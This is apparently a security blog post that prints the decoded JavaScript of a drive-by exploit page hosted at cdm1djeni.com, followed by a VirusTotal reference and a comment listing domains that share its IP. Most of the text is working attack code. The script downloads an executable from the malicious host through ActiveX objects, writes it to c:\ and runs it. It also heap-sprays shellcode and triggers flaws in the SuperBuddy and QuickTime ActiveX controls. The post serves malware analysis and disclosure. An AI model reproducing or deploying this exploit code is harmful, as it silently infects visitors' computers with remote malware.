cdm1djeni.com/cgi-bin/index.cgi?dx

after a series of obfuscated JS, the final decoded content as follows:


function C6v5phSX(j77jHqSx)
{
var oc_BNXRW = “abcdefghiklmnopqrstuvwxyz0123456789″;
var NqQGG_DK = ”;
for (var VkTuCgOU=0; VkTuCgOU<j77jHqSx; VkTuCgOU++) {
var EJiBajEW = Math.floor(Math.random() * oc_BNXRW.length);
NqQGG_DK += oc_BNXRW.substring(EJiBajEW, EJiBajEW+1);
}

return NqQGG_DK;
}

function nhF95ggb(y0_xpFSO, cl5GFOBF)
{
var e5JkKGLv = null;
var FwZ7TC6m = ‘e5JkKGLv=y0_xpFSO.’;
var kBZ6XrGB = new Array(
‘CreateObject(cl5GFOBF)’,
‘CreateObject(cl5GFOBF, “”)’,
‘CreateObject(cl5GFOBF, “”, “”)’,
‘GetObject(“”, cl5GFOBF)’,
‘GetObject(cl5GFOBF, “”)’,
‘GetObject(cl5GFOBF)’
);

var AKEfb1ki=0;

while(!e5JkKGLv && AKEfb1ki < kBZ6XrGB.length) {
try {
eval(FwZ7TC6m+kBZ6XrGB[AKEfb1ki]);
} catch(e) { }

AKEfb1ki++;
}

return e5JkKGLv;
}

function TG1sjYUg(SJxyPXTM, AOowwO_Y)
{

try {
SJxyPXTM.open(“GET”, AOowwO_Y, false);
SJxyPXTM.send(null);

} catch(e) { return 0; }

return SJxyPXTM.responseBody;
}

function KieZ8MGb(HkhWGaSf, Q2RHKRuF, gzYwvXyt)
{

try {
HkhWGaSf.Type = 1;
HkhWGaSf.Mode = 3;
HkhWGaSf.Open();
HkhWGaSf.Write(gzYwvXyt);
HkhWGaSf.SaveToFile(Q2RHKRuF, 2);
HkhWGaSf.Close();
} catch(e) { return 0; }

return 1;
}

function SYvN4dUb(NdhWqtKB, SJxyPXTM, HkhWGaSf, Zy7W1vBo, L_uBnbvS)
{
var Og_Gb_YY = 0;
var AnZ1BTbf = TG1sjYUg(SJxyPXTM, NdhWqtKB);

if (AnZ1BTbf != 0) {
var bW8QW__e = “c:\\”+C6v5phSX(6)+”.exe”;

if (KieZ8MGb(HkhWGaSf, bW8QW__e, AnZ1BTbf) == 1) {
if (L_uBnbvS == 0) {
try {
Zy7W1vBo.Run(bW8QW__e, 0);
Og_Gb_YY = 1;
} catch(e) { }
} else {
try {
Zy7W1vBo.ShellExecute(bW8QW__e, “”, “”, “open”, 0);
Og_Gb_YY = 1;
} catch(e) { }
}
}
}

return Og_Gb_YY;
}

function yTTEd2kT()
{
var xRWj5NGK = 0;
var AH7UTZwx = 1;
var AkJeAG2v = “http://cdm1djeni.com/cgi-bin/index.cgi?ede3a3fe0100f060021e964552060000000002a55854370003040900000000020&#8221;;
var ctoobgsG = new Array(null, null, null);

try {
var wP34Rhxr = 0;
var pdFNqmUw = document.createElement(“object”);
pdFNqmUw.setAttribute(“classid”, “clsid:BD96C556-65A3-11D0-983A-00C04FC29E36”);

if (pdFNqmUw) {
ctoobgsG[0] = nhF95ggb(pdFNqmUw, “msxml2.XMLHTTP”);
if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, “Microsoft.XMLHTTP”);

if (!ctoobgsG[0])
ctoobgsG[0] = nhF95ggb(pdFNqmUw, “MSXML2.ServerXMLHTTP”);

ctoobgsG[1] = nhF95ggb(pdFNqmUw, “ADODB.Stream”);

ctoobgsG[2] = nhF95ggb(pdFNqmUw, “WScript.Shell”);

if (!ctoobgsG[2]) {
ctoobgsG[2] = nhF95ggb(pdFNqmUw, “Shell.Application”);
if (ctoobgsG[2]) wP34Rhxr = 1;
}
}

if (ctoobgsG[0] && ctoobgsG[1] && ctoobgsG[2]) {
for(var maApDNpL=0;maApDNpL<AH7UTZwx;maApDNpL++) {
var jwOMpHKx = SYvN4dUb(AkJeAG2v+maApDNpL.toString(), ctoobgsG[0], ctoobgsG[1], ctoobgsG[2], wP34Rhxr);

if (!xRWj5NGK)
xRWj5NGK = jwOMpHKx;
}
}

} catch(e) {}

return xRWj5NGK;
}

function fXNZKHCv(YyJyCoZl, CGoWNZCa)
{
try {

var t7EpCn8v = new Date();
t7EpCn8v.setDate(t7EpCn8v.getDate() + 120000);

if (YyJyCoZl) {
document.cookie =
“id=” + YyJyCoZl +
“; path=/” +
“; expires=” + t7EpCn8v.toGMTString();
}

if (CGoWNZCa) {
document.cookie =
“addt=” + CGoWNZCa +
“; path=/” +
“; expires=” + t7EpCn8v.toGMTString();
}

} catch(e) {
}
}

var rjnbcVWi = new Array();
var TLJFLY3j = 0;

function cRptI8eT()
{
rjnbcVWi = rjnbcVWi;
setTimeout(cRptI8eT, 100);
}

function BhC9PuAe(fGQW2WpI, axv_tc2J)
{
while (fGQW2WpI.length*2<axv_tc2J)
fGQW2WpI += fGQW2WpI;

fGQW2WpI = fGQW2WpI.substring(0,axv_tc2J/2);
return fGQW2WpI;
}

function z5UkPTPx()
{
if (!TLJFLY3j) {
var Imbda2fQ = 0x0c0c0c0c;
var vfsx2ajx = unescape(“%u00e8%u0000%u5d00%uc583%ub914%u0190%u0000%u08b0%u4530%u4500%u7549%uebf9%u9800%u9898%u9898%u9898%ue198%u08f4%u0808%u6c57%u38a9%u0808%u7008%u8304%u0448%u7883%ua514%u6083%ue300%u8301%u3c48%u4885%u8374%u3460%uff83%u0c62%ue051%u0887%u0808%uf1ea%u6760%u0866%u6008%u7a7d%u6564%uf75c%u831e%ue0e0%u0871%u0808%udf83%u884f%u0837%uf27d%u5f4f%u884f%u0837%uf27d%ue783%u3b57%u89c1%u0ce4%u0809%u8308%u59d4%u5b5a%u0c60%u0809%uf708%u045e%u5152%u5a59%u0a83%u4b5b%u3388%u7d08%u89f2%uf473%u6d26%u6d70%u0b7d%ue38b%u8100%ucf0b%u0c4b%u6d26%u6d70%u4bce%u0800%u8253%u0cc9%u8038%u084d%uc83b%u5858%u5f5b%uf758%u185e%uf08b%u7d08%u620e%u5b09%u5ef7%u520c%u8b51%u0cca%u8849%u0832%ubc7d%u5ef7%u5900%u835e%u347d%u7c83%u7026%ufd0b%u835e%u287e%ufd0b%uc13b%u4941%u0ba5%u3bcd%u07d3%u18b6%ude32%u007c%uc3c9%u0b05%u48d2%uf9e3%u1733%uef7d%u8356%u2c56%ud50b%u836e%u4304%u5683%u0b14%u83d5%u830c%ucd0b%u56a3%ucb51%uf7e0%uf7f6%u86f7%u0646%u90e4%u82f6%u7606%uead0%u3b7b%u82c2%u3e53%u2712%u4b78%u5171%u087d%u7c60%u787c%u2732%u6b27%u656c%u6c39%u6d62%u6166%u6b26%u6567%u6b27%u616f%u6a25%u6661%u6127%u6c66%u706d%u6b26%u616f%u6d37%u6d6c%u693b%u6e3b%u386d%u3839%u6e38%u3e38%u3838%u393a%u316d%u3c3e%u3d3d%u383a%u383e%u3838%u3838%u3838%u3838%u693a%u3d3d%u3d30%u3b3c%u383f%u3838%u383b%u383c%u3831%u3838%u3838%u3838%u3838%u3830%u0008”);
var A1GHCJ0I = 0x400000;
var Yv0fjrfS = vfsx2ajx.length * 2;
var axv_tc2J = A1GHCJ0I – (Yv0fjrfS+0x38);
var fGQW2WpI = unescape(“%u0c0c%u0c0c”);

fGQW2WpI = BhC9PuAe(fGQW2WpI,axv_tc2J);
var gqW1gRWx = (Imbda2fQ – 0x400000)/A1GHCJ0I;

for (var rDjzS8iO=0;rDjzS8iO<gqW1gRWx;rDjzS8iO++) {
rjnbcVWi[rDjzS8iO] = fGQW2WpI + vfsx2ajx;
}

TLJFLY3j = 1;
cRptI8eT();
}

return 0;
}

function aYDOf7kN() {

try {
var lKcQNr_i = new ActiveXObject(‘Sb.SuperBuddy’);

if (lKcQNr_i) {
z5UkPTPx();
fXNZKHCv(9);
lKcQNr_i.LinkSBIcons(0x0c0c0c0c);
}
} catch(e) {
}

return 0;
}

function yWU2EXku()
{
try {
var EF8iSrGY = new ActiveXObject(“QuickTime.QuickTime.4”);

if (EF8iSrGY) {
z5UkPTPx();
var HRtvZlIp = “”;
for(var cwfnrm_q=0;cwfnrm_q<200;cwfnrm_q++) {
HRtvZlIp += “AAAA”;
}

HRtvZlIp += “AAA”;

for(var cwfnrm_q=0;cwfnrm_q<3;cwfnrm_q++) {
HRtvZlIp += “\x0c\x0c\x0c\x0c”;
}

var Xx88lxkG =
‘<object classid=”clsid:02BF25D5-8C17-4B23-BC80-D3488ABDDC6B” width=”200″ height=”200″>’ +
‘<param name=”src” value=”http://cdm1djeni.com/cgi-bin/index.cgi?ede3a3fe0100f060011e964552060000000002a5585437000304090000000006″>&#8217; +
‘<param name=”type” value=”image/x-quicktime”>’ +
‘<param name=”autoplay” value=”true”>’ +
‘<param name=”qtnext1″ value=”<rtsp://AXDOF:’ + HRtvZlIp +
‘>T<myself>”>’ +
‘<param name=”target” value=”myself”>’ +
‘</object>’;

i44TB6HK = 0;
var Nj2qgprh = document.createElement(“div”);
Nj2qgprh.innerHTML = Xx88lxkG;
fXNZKHCv(6);
document.body.appendChild(Nj2qgprh);

}
} catch(e) {
}

return 0;
}
if (yTTEd2kT() || aYDOf7kN() || yWU2EXku()
) {
document.QvPNJ2gK = ‘about:blank’;
} else {
document.QvPNJ2gK = ‘about:blank’;
}

/*setTimeout(function() {
if (document.i44TB6HK && document.MNYpDkrw && document.DApIuZCX) {
setTimeout(“window.location = ‘” + document.QvPNJ2gK + “‘;”, 1000);
} else {
setTimeout(arguments.callee, 1000);
}
}, 1000);*/

The VT analysis of http://cdm1djeni.com/cgi-bin/index.cgi?ede3a3fe0100f060021e964552060000000002a55854370003040900000000020 is here

Advertisements

One Response to “cdm1djeni.com/cgi-bin/index.cgi?dx”

  1. Based on robtex lookup, the following domains share the same IP address:
    cdm1djeni.com
    daadhevif.com
    den2djeni.com
    dtd1eni.com
    etcyght.com
    eue2eni.com
    gvryehght.com
    hiepdjeni.com
    jjgyght.com

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: